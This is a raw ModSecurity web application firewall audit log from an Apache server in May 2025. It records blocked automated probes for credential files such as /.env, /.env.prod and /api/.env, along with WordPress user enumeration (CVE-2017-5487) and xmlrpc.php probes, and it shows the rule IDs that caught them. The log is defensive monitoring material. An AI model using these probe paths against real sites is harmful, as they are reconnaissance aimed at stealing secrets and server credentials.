bolang.twilightparadox.com X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5936b573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5936b573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746180874326985 787 (- - -) Stopwatch2: 1746180874326985 787; combined=333, p1=306, p2=0, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5936b573-Z-- --d3c9e056-A-- [02/May/2025:17:27:54 +0700] aBSeKvNNWdC6CAybkqMJ7QAAAMw 103.236.140.4 38166 103.236.140.4 8181 --d3c9e056-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 159.65.144.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 159.65.144.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d3c9e056-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3c9e056-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746181674759305 835 (- - -) Stopwatch2: 1746181674759305 835; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3c9e056-Z-- --ec2d141e-A-- [02/May/2025:18:55:27 +0700] aBSyr8wZl97WzW7hutNVSAAAABI 103.236.140.4 39126 103.236.140.4 8181 --ec2d141e-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.172.158.128 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.172.158.128 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ec2d141e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec2d141e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746186927430930 887 (- - -) Stopwatch2: 1746186927430930 887; combined=412, p1=383, p2=0, p3=0, p4=0, p5=29, sr=179, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec2d141e-Z-- --ff231b62-A-- [02/May/2025:19:27:00 +0700] aBS6FBXwRgnphTBdhpRnngAAAI0 103.236.140.4 58172 103.236.140.4 8181 --ff231b62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff231b62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff231b62-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746188820626158 2595 (- - -) Stopwatch2: 1746188820626158 2595; combined=1200, p1=405, p2=770, p3=0, p4=0, p5=25, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff231b62-Z-- --a8a6c030-A-- [02/May/2025:19:27:04 +0700] aBS6GBXwRgnphTBdhpRnoAAAAIY 103.236.140.4 58236 103.236.140.4 8181 --a8a6c030-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8a6c030-C-- demo.sayHello --a8a6c030-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8a6c030-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746188824720228 6808 (- - -) Stopwatch2: 1746188824720228 6808; combined=4808, p1=603, p2=3954, p3=41, p4=42, p5=99, sr=77, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8a6c030-Z-- --4c0b8225-A-- [02/May/2025:20:17:47 +0700] aBTF-_NNWdC6CAybkqMQAgAAANI 103.236.140.4 35516 103.236.140.4 8181 --4c0b8225-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4c0b8225-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c0b8225-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746191867503522 3089 (- - -) Stopwatch2: 1746191867503522 3089; combined=1379, p1=500, p2=850, p3=0, p4=0, p5=29, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c0b8225-Z-- --3fc7a757-A-- [02/May/2025:20:17:50 +0700] aBTF_vNNWdC6CAybkqMQAwAAAMM 103.236.140.4 35520 103.236.140.4 8181 --3fc7a757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fc7a757-C-- demo.sayHello --3fc7a757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fc7a757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746191870557571 6434 (- - -) Stopwatch2: 1746191870557571 6434; combined=4589, p1=644, p2=3707, p3=39, p4=42, p5=95, sr=82, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fc7a757-Z-- --59a6415a-A-- [02/May/2025:20:34:19 +0700] aBTJ28wZl97WzW7hutNbcgAAAA0 103.236.140.4 35660 103.236.140.4 8181 --59a6415a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --59a6415a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59a6415a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746192859913850 3116 (- - -) Stopwatch2: 1746192859913850 3116; combined=1367, p1=456, p2=875, p3=0, p4=0, p5=35, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59a6415a-Z-- --f7b7727d-A-- [02/May/2025:20:34:22 +0700] aBTJ3qGyUvHV-cebb6411QAAAEo 103.236.140.4 35664 103.236.140.4 8181 --f7b7727d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f7b7727d-C-- demo.sayHello --f7b7727d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7b7727d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746192862697719 5501 (- - -) Stopwatch2: 1746192862697719 5501; combined=4075, p1=562, p2=3299, p3=29, p4=33, p5=90, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7b7727d-Z-- --b461875f-A-- [02/May/2025:20:42:42 +0700] aBTL0swZl97WzW7hutNbeAAAAAQ 103.236.140.4 35702 103.236.140.4 8181 --b461875f-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b461875f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b461875f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193362528881 848 (- - -) Stopwatch2: 1746193362528881 848; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b461875f-Z-- --e3e45f00-A-- [02/May/2025:20:42:43 +0700] aBTL08wZl97WzW7hutNbeQAAAAA 103.236.140.4 35704 103.236.140.4 8181 --e3e45f00-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e3e45f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3e45f00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193363822481 740 (- - -) Stopwatch2: 1746193363822481 740; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3e45f00-Z-- --c4369d58-A-- [02/May/2025:20:42:45 +0700] aBTL1cwZl97WzW7hutNbegAAAAY 103.236.140.4 35706 103.236.140.4 8181 --c4369d58-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c4369d58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4369d58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193365135747 710 (- - -) Stopwatch2: 1746193365135747 710; combined=301, p1=267, p2=0, p3=0, p4=0, p5=33, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4369d58-Z-- --62e2883c-A-- [02/May/2025:20:42:46 +0700] aBTL1swZl97WzW7hutNbewAAAAM 103.236.140.4 35708 103.236.140.4 8181 --62e2883c-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --62e2883c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62e2883c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193366454066 952 (- - -) Stopwatch2: 1746193366454066 952; combined=437, p1=396, p2=0, p3=0, p4=0, p5=41, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62e2883c-Z-- --5550432d-A-- [02/May/2025:20:42:54 +0700] aBTL3hXwRgnphTBdhpRpewAAAIM 103.236.140.4 35726 103.236.140.4 8181 --5550432d-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5550432d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5550432d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193374581872 684 (- - -) Stopwatch2: 1746193374581872 684; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5550432d-Z-- --9d4ff06e-A-- [02/May/2025:20:42:55 +0700] aBTL38wZl97WzW7hutNbggAAABU 103.236.140.4 35728 103.236.140.4 8181 --9d4ff06e-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9d4ff06e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d4ff06e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193375275239 659 (- - -) Stopwatch2: 1746193375275239 659; combined=248, p1=217, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d4ff06e-Z-- --0552ce79-A-- [02/May/2025:21:26:04 +0700] aBTV_BXwRgnphTBdhpRplgAAAIQ 103.236.140.4 36022 103.236.140.4 8181 --0552ce79-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0552ce79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0552ce79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746195964643888 790 (- - -) Stopwatch2: 1746195964643888 790; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0552ce79-Z-- --e5c46977-A-- [02/May/2025:21:26:16 +0700] aBTWCPNNWdC6CAybkqMQMwAAAMI 103.236.140.4 36024 103.236.140.4 8181 --e5c46977-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e5c46977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5c46977-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746195976057222 794 (- - -) Stopwatch2: 1746195976057222 794; combined=315, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5c46977-Z-- --af0a4139-A-- [02/May/2025:21:28:30 +0700] aBTWjhXwRgnphTBdhpRpmQAAAJA 103.236.140.4 36038 103.236.140.4 8181 --af0a4139-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --af0a4139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af0a4139-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746196110152497 792 (- - -) Stopwatch2: 1746196110152497 792; combined=319, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af0a4139-Z-- --ad31ae0b-A-- [02/May/2025:21:28:34 +0700] aBTWkhXwRgnphTBdhpRpmgAAAI4 103.236.140.4 36040 103.236.140.4 8181 --ad31ae0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ad31ae0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad31ae0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746196114886740 641 (- - -) Stopwatch2: 1746196114886740 641; combined=260, p1=226, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
